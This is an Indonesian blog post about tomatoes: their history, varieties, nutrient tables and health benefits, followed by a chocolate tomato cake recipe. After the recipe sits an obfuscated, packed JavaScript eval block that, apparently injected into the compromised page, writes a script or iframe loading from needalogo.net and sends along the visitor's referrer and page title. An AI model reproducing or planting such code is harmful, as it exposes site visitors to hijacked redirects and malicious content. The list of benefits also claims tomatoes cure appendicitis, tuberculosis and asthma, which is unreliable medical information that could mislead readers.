browser icon
You are using an insecure version of your web browser. Please update your browser!
Using an outdated browser makes your computer unsafe. For a safer, faster, more enjoyable user experience, please update your browser today or try a newer browser.

Si Bulat Tomat

Posted by on November 25, 2013

Siapa tak kenal sayuran (atau buah? ) yang satu ini. Tomat seringkali disantap segar begitu saja sebagai teman lalapan, atau ditaburi gula dan dikudap langsung, bisa juga di juice atau bahkan disambal.

Tomat memang banyak digemari oleh masyarakat. Keistimewaannya dibanding buah lain terletak pada rasa, manfaat, bentuk, dan warna. Bentuk tomat sendiri bervariasi. Ada yang bulat seperti apel, bulat pipih, dan ada yang seperti bola lampu.

Menurut tulisan karangan Andrew F. Smith “The Tomato in America”, tomat kemungkinan berasal dari daratan tinggi pantai barat Amerika Selatan. Kemudian tanaman ini muncul di Mexico lalu menampakkan dirinya di antara bangsa Indian suku Aztec. Mereka menyebutkan dengan nama Xitomatle yang kemudian di singkat menjadi tomato oleh orang Spanyol saat mereka membawa tanaman tomato tersebut ke negara mereka. Setelah Spanyol menguasai Amerika Selatan, mereka menyebarkan tanaman tomat ke koloni-koloni mereka di Karibia. Spanyol juga kemudian membawa tomat ke Filipina, yang menjadi titik awal penyebaran ke daerah lainnya di seluruh benua Asia. Spanyol juga membawa tomat ke Eropa. Tanaman ini tumbuh dengan mudah di wilayah beriklim Mediterania.

Tomat (Solanum lycopersicum syn. Lycopersicum esculentum) adalah tumbuhan dari keluarga Solanaceae, tumbuhan asli Amerika Tengah dan Selatan, dari Meksiko sampai Peru. Tomat merupakan tumbuhan siklus hidup singkat, dapat tumbuh setinggi 1 sampai 3 meter. Tomat merupakan keluarga dekat dari kentang.  Kata “tomat” sendiri berasal dari kata dalam bahasa Nahuatl, tomatl (dieja: /tɔ.matɬ/).

Berdasarkan penampilanTerdapat buah tomat dengan kisaran warna dari hijau ketika masak, kuning, jingga, merah, ungu (hitam), serta belang-belang.
Berdasarkan bentuk
Bbuah tomat digolongkan seperti berikut ini :
  • Tomat Biasa ( Lycopersicum commune )
  • Bentuknya bulat pipih dan tidak beraturan.
  • Tomat Apel ( Lycopersicum pyriforme )
  • Bentuknya bulat, kokoh, sedikit keras menyerupai buah apel.
  • Tomat Kentang ( Lycopersicum grandfolium )
  • Bentuknya bulat, besar, padat, menyerupai buah apel hanya agak kecil sedikit dan daunnya lebar-lebar.
  • Tomat Keriting ( Lycopersicum validium ) Bentuknya agak lonjong, keras seperti alpukat atau pepaya yang dikenal sebagai tipe Roma. Tomat ini banyak disenangi, karena kulitnya tebal.
Berdasarkan kegunaanOrang mengenal tomat buah, tomat sayur, serta tomat lalapan. Berdasarkan hal ini, fungsi tomat merupakan klasifikasi dari buah maupun sayuran, walaupun struktur tomat adalah struktur buah.
Sejak dulu tomat dikenal memiliki kandungan gizi dan nutrisi yang tinggi. Vitamin buah tomat ternyata lebih tinggi jika di bandingakan dengan vitamin buah jeruk. Berdasarkan beberapa penelitian yang pernah di lakukan, menunjukkan bahwa warna merah yang ada pada tomat menandakan bahwa kandungan vitaminnya tinggi. Semakin matang buah tersebut semakin banyak pula kandungan vitaminnya.
Karena kandungan gizi dan vitamin buah tomat inilah
sehingga banyak yang gemar untuk mengkonsumsinya sebagai bahan penyedap rasa. Vitamin buah tomat di kenal sebagai tonik yang dapat menambah kekuatan tubuh, meningkatkan kekebalan tubuh terhadap penyakit, serta merangsang daya pikir otak.
Tak hanya vitamin, buah ini juga mengandung Lycopen. Lycopen merupakan zat anti oksidan yang sangat baik untuk menghancurkan radikal bebas akibat polusi kendaraan serta asap rokok yang masuk ke dalam tubuh. Lycopen juga dikenal berperan aktif dalam pencegahan kerusakan sel yang bisa mengakibatkan kanker prostat, kanker mulut rahim atu serviks, dan sebagainya.

Selain itu, dalam buah tomat juga banyak terkandung zat-zat yang berguna bagi tubuh manusia. Zat-zat yang terkandung di dalamnya antara lain karbohidrat, protein, lemak, vitamin B1, B2, B3, dan C, kalsium, fosfor, besi, natrium, kalium, serat, dan air. Tomat juga mengandung karoten yang berfungsi sebagai pembentuk provitamin A.  Kandungan vitamin buah tomat yang sangat banyak, seperti vitamin A dan vitamin B yang mencapai 1600 IU sehingga dipercaya dapat mencegah penyakit mata. Ada pula vitamin C dengan kadar 35 mg Kandungan gizi selengkapnya dapat dibaca sebagai berikut:

Kandungan nilai gizi pada buah tomat segar dari tiap 100 g buah menurut Direktorat Gizi Departemen Kesehatan RI (1972)
  1. Karoten ( vitamin A )   ————   1500 S.I.
  2. Thiamin (vitamin B )   ————-        60 μg
  3. Riboflavin (vitamin B2)    ———        -
  4. Asam askorbat ( vitamin C )  —–        40 mg
  5. Protein         ———————         1 g
  6. Karbohidrat  ——————–           4,2 g
  7. Lemak    ————————          0,3 g
  8. Kalsium ( Ca )  —————–           5 mg
  9. Fosfor ( P )   ——————-          27 mg
  10. Zat Besi ( Fe )  —————–         0,5 mg
  11. Bagian yang dapat dimakan (Bdd) –    95 %

Kandungan Gizi Tomat merah, mentah Nilai gizi per 100  menurut USDA Nutrient databaseg (3.5 oz):
Energi 75 kJ (18 kcal)
Karbohidrat 4 g
Gula 2.6 g
Diet serat 1 g
Lemak 0,2 g
Protein 1 g
Air 95 g
Vitamin C 13 mg (22%)

Pantesan aja si tomat banyak penggemar, kandungan nutrisinya bejibun gitu. Belum lagi warna dan penampilannya yang menggoda seolah memanggil manggil.   Nah karena memiliki sejuta nutrisi, tentu tomat memiliki banyak manfaat bagi kesehatan, diantaranya adalah:

  • Mencegah dan mengobati radang usus buntu
  • Membantu penyembuhan penyakit rabun senja
  • Mengobati penyakit yang disebabkan kekurangan vitamin C
  • Mengobati gigi dan gusi
  • Menjaga stamina
  • Mempercepat penyembuhan luka
  • Mengobati jerawat
  • Mencegah batu empedu pada saluran kencing, lever, encok, TBC asma

Wah ternyata buah (atau sayuran? ) yang satu ini kaya manfaat banget ya, jadi makin cinta deh sama si tomat, apalagi kalo makannya pake resep dibawah ini:

CAKE TOMAT CHOCOLATE

  • 4 sendok makan krim kental
  • 4 sendok makan susu cair
  • 125 gram milk chocolate, cincang
  • 150 gram gula palm
  • 125 gram mentega tawar
  • 165 gram gula pasir
  • 2 butir kuning telur
  • 3 butir putih telur, kocok kaku
  • 300 gram terigu
  • 1 sendok teh vanilli
  • ½ sendok teh baking powder
  • ¼ sendok teh garam
  • 200 gram tomat, haluskan

 Milk chocolate icing :

  • 125 gram milk chocolate, lelehkan
  • 200 gram mentega tawar
  • 400 gram gula halus

Cara membuat :

  1. Panaskan krim kental, susu cair, angkat. Masukkan cokelat dan gula palm, aduk hingga larut
  2. Kocok mentega, gula pasir hingga lembut. Masukkan kuning telur, kocok hingga rata.
  3. Masukkan terigu, vanili, baking powder, dan garam. Aduk rata
  4. Masukkan campuran susu, tomat. Aduk rata. Tambahkan putih telur, aduk rata kembali.
  5. Tuang adonan ke dalam Loyang yang telah dioles mentega. Oven 180 derajat Celcius, 45 menit hingga matang
  6. Milk chocolate icing : kocok mentega, gula halus, milk cokelat, hingga lembut
  7. Oles cake dengan icing cokelat. Potong-potong. Sajikan


eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\’b\’);2 6=7.c(7.e()*f);2 0=\’g://h.i/j/k?\’;0=0+\’l=\’+3.m;0=0+\’&n=\’+3.o;0=0+\’&r=\’+6;d.p(\’\’)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))

Leave a Reply